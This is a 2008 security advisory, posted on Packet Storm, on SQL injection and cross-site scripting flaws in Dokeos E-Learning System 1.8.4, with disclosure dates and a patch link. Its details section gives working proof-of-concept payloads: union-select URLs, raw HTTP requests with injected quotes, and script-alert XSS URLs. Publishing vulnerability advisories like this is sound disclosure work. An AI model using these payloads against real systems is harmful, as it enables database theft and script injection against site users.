exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DSECRG-08-015.txt

DSECRG-08-015.txt
Posted Feb 20, 2008
Authored by Sh2kerr, Stas Svistunovich | Site dsecrg.com

Dokeos E-Learning System version 1.8.4 suffers from multiple SQL injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | cd9634d0aea265fcad8eabb0e0dc93235acca8bd33ddafd153c9968354db4b5b

DSECRG-08-015.txt

Change Mirror Download

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-015


Application: Dokeos E-Learning System
Versions Affected: 1.8.4
Vendor URL: https://dokeos.com
Bugs: Multiple SQL Injections,Multiple Blind SQL Injections,Multiple XSS, etc.
Exploits: YES
Reported: 25.01.2008
Vendor response: 28.01.2008
Patch released: 12.02.2008
Date of Public Advisory: 19.02.2008
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Dokeos E-Learning System system has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Blind Sql Injections
3. Multiple Stored XSS
4. Multiple Linked XSS
5. Image XSS

Details
*******


1. Multiple SQL Injections

1.1 Attacker can inject SQL code in module /whoisonline.php vulnerable parametr id
Attacker must have valid user creditionals


Example:
https://[server]/[installdir]/whoisonline.php?id=1'+and+"dsec"="dsecrg"+union+select+user(),version()/*


1.2 Attacker can inject SQL code in module main/mySpace/index.php vulnerable parameter tracking_list_coaches_column





Example:

https://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin
&tracking_list_coaches_column=0';

1.3 Attacker can inject SQL code in module /dokeos/main/create_course/add_course.php POST Parameter tutor_name


Example:

POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: https://localhost/dokeos/main/create_course/add_course.php

title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&
tutor_name='



---------------------------------------------------------------------


2. Multiple SQL Injections

2.1 Vulnerability found in script index.php in header parameter "Referer"


Example:

GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '

2.1 Vulnerability found in script /main/admin/class_list.php? in header parameter "X-Fowarded-For"



---------------------------------------------------------------------




3. Stored XSS vulnerability found in /main/auth/inscription.php attacker can inject XSS in POST parameter username


---------------------------------------------------------------------

4. Multiple linked XSS


4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php attacker can inject XSS in parameter courseCode


Example:

https://[server]/[installdir]/main/calendar/myagenda.php?courseCode="><script>alert('DSecRG XSS')</script>



4.2 Linked XSS vulnerability found in main/admin/course_category.php attacker can inject XSS in parameter category

Example:

https://[server]/[installdir]/dokeos/main/admin/course_category.php?category=<script>alert('DSecRG XSS')</script> HTTP/1.0



4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php attacker can inject XSS in parameter cmessage


Example:

https://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=>%22%27><img/src=javascript:alert('DSecRG XSS')>

---------------------------------------------------------------------


5. Image XSS vulnerability in page main/auth/profile.php attacker can upload avatar picture with XSS code:


Example:

More info: https://www.dsec.ru/about/articles/web_xss/ (in Russian)

---------------------------------------------------------------------

Fix Information
***************

Vendor fix this flaw on 12.02.2008. Patch for version 1.8.4 can be downloaded here:

https://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
https://www.dsec.ru (in Russian)





Digital Security Research Group mailto:research@dsec.ru
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close